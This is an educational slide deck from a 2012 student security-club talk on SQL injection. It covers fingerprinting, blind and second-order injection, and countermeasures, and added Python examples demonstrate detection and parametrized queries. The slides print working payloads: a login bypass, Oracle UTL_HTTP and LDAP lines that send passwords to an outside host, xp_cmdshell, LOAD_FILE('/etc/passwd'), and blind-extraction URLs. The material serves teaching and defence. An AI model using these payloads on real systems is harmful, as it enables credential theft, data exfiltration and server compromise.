• Injection vulnerabilities are common in web applications. Some target databases: « SQL injections ». The impact of exploiting such vulnerabilities ranges from data retrieval, modification and deletion to, in certain cases, remote code execution!
• Speakers: Franck De Goër, Fabien Duchene
Let me SQL inject your heart! SecurIMAG 2012-02-09
WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.
¡¡_ (in)security we trust _!!
SecurIMAG -‐ SQLi – F. De Goër – F. Duchene – 09 FEV 2012
Franck De Goër
- Background: PT preparatory class at F. Buisson (Voiron, 38); 1st year at ENSIMAG
- Goals: ISI; PhD (?); teaching and research
- WHY security?: it touches every branch of computer science, and a given problem admits multiple approaches
- Introduction
- Injection: attacking datastores (XPath, LDAP, SQL)
- SQL language
- SQL injection: definitions
- Fingerprinting (specificities: Oracle, MS SQL, MySQL)
- Some cool beef: first order SQLi, second order SQL injection, blind SQLi
- Automatic detection
- Counter-measures
- Conclusion
Outline
« Security exploitation technique that permits injecting data and/or code »
Some injection examples:
Targeted system | What can be injected? | Vulnerability examples
In-memory executable | Assembly instructions | Buffer overflow, Use-After-Free, …
Web server CGI-like application | Additional HTML nodes | Cross-site scripting (XSS), SVG injection, …
Data stores | Additional DATA and/or COMMANDS | SQL injection, XPath injection, LDAP injection
Injection
For a given transition (HTTP request / HTTP reply), an injection is the ability to craft an input parameter so that a subsystem that does not filter that parameter sufficiently uses it as data or code.
Input parameters examples:
- User-Agent:
- HTTP METHOD: HEAD, GET…
Output examples:
- HTTP CONTENT
- HTTP-Only cookies
- HTML code
Web injection - intuitively
- Relational databases. 1986. Current: SQL3 (SQL99). SQL grammar.
- A language for:
-- querying: SELECT
-- data manipulation: UPDATE, INSERT, DELETE
-- data definition: CREATE, ALTER, DROP
-- data access control: GRANT, REVOKE
Database: francky-vincent
Table: accounts
id | user | password
1 | franck | Ada.Text_Io
2 | securimag | quarante-deux
... | ... | ...
Table: news
id | date | text
1 | 09-02-12 | SQLi – F. De Goër – F. Duchene
2 | ... | ...
(a column is a field; a row is a record)
Structured Query Language
- querying a database: extract of the SQL grammar for the SELECT statement:
SELECT * FROM table WHERE cond
Eg: SELECT id FROM accounts WHERE user='franck' AND password='Ada.Text_Io'
SQL query example
(figure) HTTP client (e.g. browser) --HTTP / HTML--> Web server CGI (e.g. httpd+php) --SQL API (e.g. mysql library)--> SQL daemon (e.g. mysqld)
SQL injection – intuitively (1/4)
User input = a set of input parameters
The Web Application Hacker’s Handbook 2nd ed
HTML form:
HTTP Request:
SQL injection – intuitively (2/4)
Hidden.php (source code extract)
Some of the input parameters:
- GET utilisateur=les blagues toto
- GET motdepasse=sukZ!
SQL query (sent to the SQL driver via the SQL API):
SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!'
SQL injection – intuitively (3/4)
SQL injection – intuitively (4/4)
Hidden.php (source code extract)
Some of the input parameters:
- GET utilisateur=???
- GET motdepasse=????
-> Problem: how to bypass that authentication scheme?
SQL query (sent to the SQL driver via the SQL API):
SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!' OR 69=69 --'
SQL injection – intuitively - Franck DEMO
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (1/3)
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (2/3)
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
SQL injection – a formal definition (3/3)
(figure: input parameter 1, input parameter 2)
Depending on how the web application developer built the application:
- when we craft an input parameter and the evaluated query does not conform to the SQL grammar, an error and/or exception MIGHT be raised … or caught!
- the SQL query sent to the SQL back-end may be displayed
SQL injection with uncaught error / exception
Useful for:
- information gathering (part of a pentester’s job):
-- which SQL system is used? (software + version)
-- which SQL language version?
-- which privileges does the user have?
- stored procedures specific to an SQL server
- exploits specific to an SQL server version
Database system fingerprinting: WHY (1/4)
DB \ impact | HTTP, SMTP, TCP requests | LDAP query! (11g)
Oracle SQL | UTL_SMTP, UTL_HTTP, UTL_TCP… toto' || UTL_HTTP_REQUEST('irc.car-online.fr:80/'||(SELECT%20%username,password%FROM%data%WHERE 1))-- | SYS.DBMS_LDAP.INIT('ldap.intranet:389',null) … SYS.DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.sub.car-online.fr',80)
Database system fingerprinting: WHY (2/4)
DB \ impact | Remote command execution | Ability to write on the filesystem | Shutdown!!
MS-SQL | Stored procedure: master..xp_cmdshell 'ipconfig /all > toto.txt' | SELECT * INTO OUTFILE '\\\\fqdn-server\\sharename\\output.txt' FROM users; | 'shutdown --
Database system fingerprinting: WHY (3/4)
DB \ impact | Information disclosure | Ability to write on the filesystem
MySQL | SELECT LOAD_FILE('/etc/passwd') | SELECT * FROM data INTO OUTFILE '/tmp/wtf.txt'
Database system fingerprinting: WHY (4/4)
DB \ impact | Causing a time delay | Database version | Current user privileges
Oracle | UTL_HTTP.REQUEST('http://car-online.fr/time/10/') | SELECT banner FROM v$version | SELECT privilege FROM session_privs
MS-SQL | WAITFOR DELAY '0:0:10' | SELECT @@version | SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
MySQL | SLEEP(100) | SELECT @@version | SELECT * FROM information_schema.user_privileges WHERE grantee = (SELECT user())
The Web Application Hacker’s Handbook 2nd ed
Database system fingerprinting: HOW - try to inject parts of the previous SQL queries directly and check for any output indicating that an error occurred. SOME EXAMPLES:
Database system fingerprinting: Franck DEMO
Blind SQL injection
Sometimes, when an SQL error is raised, the SQL query is NOT present in the webpage (HTML) output!
“Blind SQLi”
Idea: discriminate the result by observing a DIFFERENCE in the OUTPUT (HTML) depending on whether the part of the SQL query the attacker controls evaluates to FALSE or TRUE.
Eg: … WHERE cond1 AND cond2 (cond2 is attacker-controlled)
Blind SQLi: obtaining information on records
SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY 2; --';
# returns an error if nb records < 2, else returns the normal page
=> with several tests, it is possible to learn the number of records. To learn record names, brute-force:
SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY password; //';
Blind SQLi: obtaining the length of a password
For instance, if inputs are GET parameters:
http://vulnerable-web-site.com/script.php?id=1 AND length(password)=$i
# returns an error if length(password) != $i, else returns the normal page
=> by incrementing $i until the normal page is returned, we learn the length of the password
Blind SQLi: obtaining an integer value (1/5) … (5/5) (worked on the slides)
Blind SQLi: obtaining the characters of a password
Get password characters: clever brute-force
http://vulnerable-web-site.com/script.php?id=1 and substring(password,$i,1)=char($ascii_code)
# returns an error if the ith character isn't char($ascii_code), else returns the normal page
=> by testing $ascii_code, we learn the ith password character
Blind SQLi – StalkR’s write-up for phplist, SMPCTF 2010
From blind SQL injection to local file inclusion! http://blog.stalkr.net/2010/07/smpctf-challenge-11-write-up-phplist.html#more
Where?
http://localhost/ex1/admin/?page=users&start=0&find=juanito&findby=email&sortby=0&sortorder=desc&id=0&find=juanito&findby=email
SQLi query such as “SELECT field1, field2 FROM table1 WHERE condition1 AND value2=[user_controlled_field]”
Filtering?
User-controlled values? findby, sortorder, …
Interesting field for condition?
findby=email and findby=1: same page output
findby=1 AND 1: same page output! Nice start…
findby=1 AND 0
Blind SQLi discriminant: a string present on the webpage when the condition evaluates to false, e.g. "Database error", “You have an error”, …
Ex1 – Blind SQLi to LFI
Requires the FILE privilege (LOAD_FILE)
Problem: filtering on quotes in the findby parameter -> hex-encoded values
findby=1 AND substr(lpad(bin(ord(substr(load_file(0x'+file.encode('hex')+'),'+str(charpos+1)+',1))),8,0),'+str(bitpos+1)+',1)=1
StalkR script I modified to take into account a user-provided discriminant and to check whether the file exists:
ensimag-student@bt:~/Desktop/ex1-script$ ./phplist_21012_sql_injection_local_file_disclosure.py
[*] phplist 2.10.12 SQL injection, local file disclosure
Usage: ./phplist_21012_sql_injection_local_file_disclosure.py <host> <path to phplist> <admin username> <admin password> <file to get> <discriminate_string_when_condition_evaluated_to_false>
From the server side: observe whether the user-controlled input parameter is syntactically confined. If it is not, this is a sufficient condition to say it is an injection!
Automatic (and formal) detection
Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
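The server-side criterion above can be checked mechanically: build the final query, then verify that the user-supplied value landed inside exactly one data token (a string or number literal). The following is an added example written for this transcript, not code from the slides or from Wassermann's thesis tools; its tokenizer is a deliberately small hand-written lexer standing in for a real SQL parser, and the templates and candidate values are constructed.

```python
"""Server-side detection of SQL injection via syntactic confinement.

Added example (not from the slides). Criterion, simplified from the slide:
an input parameter that does not stay inside a single data token of the
final query is a sufficient condition for injection.
"""
import re

# Constructed simplification of SQL lexical structure: comments, string
# literals with doubled-quote escapes, numbers, identifiers, operators.
TOKEN_RE = re.compile(
    r"""
    (?P<ws>\s+)
  | (?P<comment>--[^\n]*|/\*.*?\*/|\#[^\n]*)
  | (?P<string>'(?:[^']|'')*')
  | (?P<number>\d+(?:\.\d+)?)
  | (?P<ident>[A-Za-z_][A-Za-z0-9_$.]*)
  | (?P<op><=|>=|<>|!=|\|\||.)
    """,
    re.VERBOSE | re.DOTALL,
)

# Query templates mirroring the slides' Hidden.php and the integer-field case.
LOGIN_TPL = "SELECT * FROM data WHERE user='les blagues toto' AND password='{}'"
ID_TPL = "SELECT * FROM data WHERE id={}"


def tokenize(sql):
    """Return (kind, start, end) spans for every non-whitespace token."""
    spans = []
    pos = 0
    while pos < len(sql):
        m = TOKEN_RE.match(sql, pos)
        if m is None:  # unreachable: the final alternative matches any char
            raise ValueError("lexer stuck at offset %d" % pos)
        if m.lastgroup != "ws":
            spans.append((m.lastgroup, m.start(), m.end()))
        pos = m.end()
    return spans


def build_query(template, value):
    """Substitute the value and return (query, start, end) of where it landed."""
    start = template.index("{}")
    query = template.replace("{}", value, 1)
    return query, start, start + len(value)


def is_confined(template, value):
    """True iff the value lies inside exactly one string or number token."""
    query, start, end = build_query(template, value)
    if start == end:  # an empty value cannot escape its token
        return True
    covering = [t for t in tokenize(query) if t[1] <= start and end <= t[2]]
    return len(covering) == 1 and covering[0][0] in ("string", "number")


def check_parameters(template, candidates):
    """Classify each candidate value as 'ok' or 'INJECTION'."""
    return {v: ("ok" if is_confined(template, v) else "INJECTION")
            for v in candidates}


if __name__ == "__main__":
    for tpl, vals in ((LOGIN_TPL, ["sukZ!", "sukZ!' OR 69=69 --", "O''Reilly"]),
                      (ID_TPL, ["42", "1 OR 1=1"])):
        print(check_parameters(tpl, vals))
```

Note the `O''Reilly` case: a value the application escaped correctly still sits inside one string token and is reported as confined, which is what distinguishes this check from a naive search for quote characters.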
Automatic detection: sqlmap.py
- client side
- Python script
- ability to fingerprint various SQL back-ends:
http://sqlmap.sourceforge.net/doc/README.pdf
Automatic detection: sqlmap.py - Franck DEMO
Counter-measures: input filters
Input filters: some developers assume that filtering the input is enough, which is sometimes not the case.
!%^$#! This however does complicate the injection!
Filter examples:
- PHP: addslashes(); injection will still work if the query looks like:
… WHERE integer_field=[USER_CONTROLLED_INPUT]
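The addslashes() weakness is easy to reproduce: the filter only escapes quote characters, and an injection into an unquoted integer field needs none. This is an added example, not code from the slides; it models addslashes() in Python (an assumption: only the quote, backslash and NUL handling is reproduced), and uses an in-memory SQLite table as a stand-in for the MySQL back-end. Because SQLite does not honour backslash escapes the way MySQL does, the example sticks to the unquoted-integer case the slide describes; the sample rows are constructed from the slides' accounts table.

```python
"""addslashes() does not protect an unquoted integer field.

Added example (not from the slides). The fix is to validate the type of
the value and bind it as a parameter rather than to escape characters.
"""
import sqlite3


def addslashes(value):
    """Python model of PHP addslashes(): backslash-escape ' \" \\ and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def make_db():
    """Constructed sample data mirroring the slides' 'accounts' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [(1, "franck", "Ada.Text_Io"), (2, "securimag", "quarante-deux")])
    return conn


def lookup_filtered(conn, user_input):
    """The weak pattern from the slide: addslashes() then an unquoted integer field."""
    query = ("SELECT user FROM accounts WHERE id=" + addslashes(user_input)
             + " ORDER BY id")
    return [row[0] for row in conn.execute(query)]


def lookup_validated(conn, user_input):
    """Hardened: the value must parse as an integer and is bound as a parameter."""
    try:
        record_id = int(user_input)
    except ValueError:
        raise ValueError("id must be an integer, got %r" % user_input)
    return [row[0] for row in conn.execute(
        "SELECT user FROM accounts WHERE id=? ORDER BY id", (record_id,))]


def compare(user_input):
    """Run both lookups on a fresh DB; 'rejected' marks a validation failure."""
    conn = make_db()
    result = {"filtered": lookup_filtered(conn, user_input)}
    try:
        result["validated"] = lookup_validated(conn, user_input)
    except ValueError:
        result["validated"] = "rejected"
    return result


if __name__ == "__main__":
    print(compare("1"))         # both paths return ['franck']
    print(compare("1 OR 1=1"))  # filtered path leaks every row; validated path rejects
```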
Input filters and second order SQL injections (1/2)
0. Filter: double every quote
1. New user registration: input1= meeraque' ; input2= Mj|_|@n|t0
INSERT INTO data (username,password) VALUES('meeraque''', 'Mj|_|@n|t0')
=> the record will contain meeraque'
2. Change password: SELECT password FROM data WHERE username='meeraque''
MySQL error! ERROR: Unclosed quote @ 42 STR: '
3. Exploitation:
3.1 Register a user with username ' OR 1 in (SELECT password FROM data WHERE username='admeenistraore')
3.2 Try to change the password: P0wn3d! Admin password in the MySQL error message!
Input filters and second order SQL injections (2/2)
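The three steps above can be replayed to see exactly where the filter stops protecting the application: the quote-doubling is correct for the INSERT it guards, but the change-password step rebuilds a query by concatenation from the stored, unfiltered username. This is an added example, not code from the slides; it uses an in-memory SQLite table as a stand-in for MySQL, and the username and password values are the slides' constructed ones. The only change shown is the defender's one: the second query is parametrized.

```python
"""Second-order SQL injection: a stored value re-enters a later query unescaped.

Added example (not from the slides). A filter applied at input time
protects only the statement it was written for; data read back from the
database is untrusted again as soon as it is concatenated into SQL text.
"""
import sqlite3


def quote_filter(value):
    """Step 0 filter from the slide: double every single quote."""
    return value.replace("'", "''")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (username TEXT, password TEXT)")
    return conn


def register_user(conn, username, password):
    """Step 1: the filtered INSERT. Returns the username as actually stored."""
    cur = conn.execute(
        "INSERT INTO data (username, password) VALUES('%s', '%s')"
        % (quote_filter(username), quote_filter(password)))
    row = conn.execute("SELECT username FROM data WHERE rowid=?",
                       (cur.lastrowid,)).fetchone()
    return row[0]


def change_password_vulnerable(conn, stored_username):
    """Step 2 as the slide shows it: the stored username is concatenated."""
    query = "SELECT password FROM data WHERE username='%s'" % stored_username
    try:
        row = conn.execute(query).fetchone()
        return row[0] if row else None
    except sqlite3.OperationalError as err:
        # The unclosed quote surfaces as a database error, as on the slide.
        return "ERROR: %s" % err


def change_password_safe(conn, stored_username):
    """Fix: every query binds its values, whether they are fresh or stored."""
    row = conn.execute("SELECT password FROM data WHERE username=?",
                       (stored_username,)).fetchone()
    return row[0] if row else None


def replay():
    """Run the slide's scenario end to end and return both outcomes."""
    conn = make_db()
    stored = register_user(conn, "meeraque'", "Mj|_|@n|t0")
    return {"stored": stored,
            "vulnerable": change_password_vulnerable(conn, stored),
            "safe": change_password_safe(conn, stored)}


if __name__ == "__main__":
    print(replay())
```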
Counter-measures: parametrized statements
- PROBLEM: SQL injection comes from the lack of a clear separation between the DATA and COMMAND parts when the SQL query is built
- parametrized statements:
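Putting the two halves of the talk side by side: the Hidden.php query from the "intuitively" slides, built by concatenation, accepts the password `sukZ!' OR 69=69 --`, while the same query as a parametrized statement treats that string as an ordinary (wrong) password. This is an added example, not code from the slides; the `data` table and the credentials `les blagues toto` / `sukZ!` are the slides' constructed values, and SQLite is an assumption standing in for the MySQL back-end.

```python
"""Parametrized statements versus string concatenation for the login query.

Added example (not from the slides). With a parametrized statement the SQL
text is fixed before any user data is seen, so the DATA/COMMAND separation
the slide asks for is enforced by the driver rather than by the developer.
"""
import sqlite3


def make_db():
    """Constructed sample account matching the slides' Hidden.php example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (user TEXT, password TEXT)")
    conn.execute("INSERT INTO data VALUES (?, ?)", ("les blagues toto", "sukZ!"))
    return conn


def login_concat(conn, utilisateur, motdepasse):
    """Hidden.php as sketched on the slides: DATA and COMMAND mixed in one string."""
    query = ("SELECT * FROM data WHERE user='" + utilisateur
             + "' AND password='" + motdepasse + "'")
    return conn.execute(query).fetchone() is not None


def login_param(conn, utilisateur, motdepasse):
    """Parametrized: SQL text is constant, values travel as bound parameters."""
    row = conn.execute("SELECT * FROM data WHERE user=? AND password=?",
                       (utilisateur, motdepasse)).fetchone()
    return row is not None


def compare(utilisateur, motdepasse):
    """Authenticate the same input both ways; True means the login succeeded."""
    conn = make_db()
    return {"concat": login_concat(conn, utilisateur, motdepasse),
            "param": login_param(conn, utilisateur, motdepasse)}


if __name__ == "__main__":
    print(compare("les blagues toto", "sukZ!"))               # both True
    print(compare("les blagues toto", "wrong"))               # both False
    print(compare("les blagues toto", "sukZ!' OR 69=69 --"))  # concat True, param False
```

In the concatenated form the trailing `--` comments out the closing quote and `OR 69=69` makes the WHERE clause true for every row; in the parametrized form the driver sends the same characters as the value of a single placeholder, so no row matches and the login fails as it should.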
No questions please!
We have exhausted our knowledge… (and frankly, I feel more about starting the apero $